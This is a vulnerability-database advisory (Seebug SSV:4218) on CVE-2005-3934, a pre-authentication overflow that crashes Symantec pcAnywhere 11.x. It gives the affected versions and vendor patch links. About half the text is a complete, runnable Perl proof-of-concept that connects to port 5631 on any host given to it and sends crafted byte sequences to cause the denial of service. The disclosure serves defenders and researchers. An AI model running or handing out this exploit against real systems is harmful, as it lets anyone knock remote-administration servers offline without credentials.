pcAnywhere Authentication Denial of Service Vulnerability

2006-08-17T00:00:00
ID SSV:4218
Type seebug
Reporter Root
Modified 2006-08-17T00:00:00

Description

BUGTRAQ ID: 15646
CVE(CAN) ID: CVE-2005-3934

Symantec pcAnywhere is the world's best-selling remote control solution for managing servers and supporting administrators.

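pcAnywhere has an overflow vulnerability in its handling of specially crafted messages, which can lead to a denial of service. Because the overflow occurs before authentication, a remote attacker can exploit this vulnerability without valid credentials.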

Symantec pcAnywhere 11.5.1
Symantec pcAnywhere 11.0.1

The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:

http://www.symantec.com/techsupp/files/pca/index.html
http://www.symantec.com/techsupp/enterprise/products/spca/files.html

#!/usr/bin/perl -w
# Version 2.0
#
# PoC for
# pcAnywhere Authentication Denial of Service Vulnerability
# Bugtraq ID:     15646
#
# Tested on pcanywhere v11.0 and v11.0.1
#
# Author: David Maciejak
# Date: 20060117
#
##############################

use IO::Socket;

if (@ARGV<1)
{
    die "usage: $0 pcanywhere_ip [port]";
}

$host=$ARGV[0];
$port=$ARGV[1] || 5631;

$|=1;

$cl1="\x00\x00\x00\x00";
$cl2="\x6F\x06\xff";
$cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
$cl4="\x6f\x62\x01\x02\x00\x00\x00";

$sock = IO::Socket::INET->new( PeerAddr => $host,
                               PeerPort => $port,
                               Proto    => 'tcp'
                             );

die "Could not create socket: $! \n" unless $sock;

$sock->send($cl1);
$sock->recv($buff,32768);
$sock->send($cl2 x 50);
$sock->recv($buff,32768);
$sock->send($cl3 x 50);
$sock->recv($buff,32768);
$sock->send($cl4);
$sock->recv($buff,32768);

$str='\x06'.'\x04'.'\0xffffffc0'x300;
$sock->send($str x 50);
close $sock;